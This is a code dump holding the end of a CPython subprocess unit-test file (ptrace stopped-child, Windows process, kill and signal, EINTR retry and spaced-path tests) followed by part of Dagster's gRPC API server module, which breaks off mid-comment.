'Linux': 'so.6',
'Darwin': 'dylib',
}
@unittest.skipIf(not ctypes, 'ctypes module required.')
@unittest.skipIf(platform.uname()[0] not in _libc_file_extensions,
'Test requires a libc this code can load with ctypes.')
@unittest.skipIf(not sys.executable, 'Test requires sys.executable.')
def test_child_terminated_in_stopped_state(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
PTRACE_TRACEME = 0 # From glibc and MacOS (PT_TRACE_ME).
libc_name = 'libc.' + self._libc_file_extensions[platform.uname()[0]]
libc = ctypes.CDLL(libc_name)
if not hasattr(libc, 'ptrace'):
raise unittest.SkipTest('ptrace() required.')
test_ptrace = subprocess.Popen(
[sys.executable, '-c', """if True:
import ctypes
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
""".format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
])
if test_ptrace.wait() != 0:
raise unittest.SkipTest('ptrace() failed - unable to test.')
child = subprocess.Popen(
[sys.executable, '-c', """if True:
import ctypes
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
libc.printf(ctypes.c_char_p(0xdeadbeef)) # Crash the process.
""".format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
])
try:
returncode = child.wait()
except Exception as e:
child.kill() # Clean up the hung stopped process.
raise e
self.assertNotEqual(0, returncode)
self.assertLess(returncode, 0) # signal death, likely SIGSEGV.
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
"poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
subprocess._has_poll = False
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._has_poll = True
ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
@unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
def test_eintr_retry_call(self):
record_calls = []
def fake_os_func(*args):
record_calls.append(args)
if len(record_calls) == 2:
raise OSError(errno.EINTR, "fake interrupted system call")
return tuple(reversed(args))
self.assertEqual((999, 256),
subprocess._eintr_retry_call(fake_os_func, 256, 999))
self.assertEqual([(256, 999)], record_calls)
# This time there will be an EINTR so it will loop once.
self.assertEqual((666,),
subprocess._eintr_retry_call(fake_os_func, 666))
self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "mswindows only")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super(CommandsWithSpaces, self).setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super(CommandsWithSpaces, self).tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
ProcessTestCaseNoPoll,
HelperFunctionTests,
CommandsWithSpaces)
test_support.run_unittest(*unit_tests)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class RepositorySymbolsAndCodePointers:
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instaniating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
# hearbeat, at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which will stop the server)
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._repository_symbols_and_code_pointers = RepositorySymbolsAndCodePointers(
loadable_target_origin
)
try:
self._repository_symbols_and_code_pointers.load()
except Exception:
if not lazy_load_user_code:
raise
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Run execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
sys.executable,
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except:
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except:
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except:
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
options=[
("grpc.max_send_message_length", max_send_bytes()),
("grpc.max_receive_message_length", max_rx_bytes()),
],
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
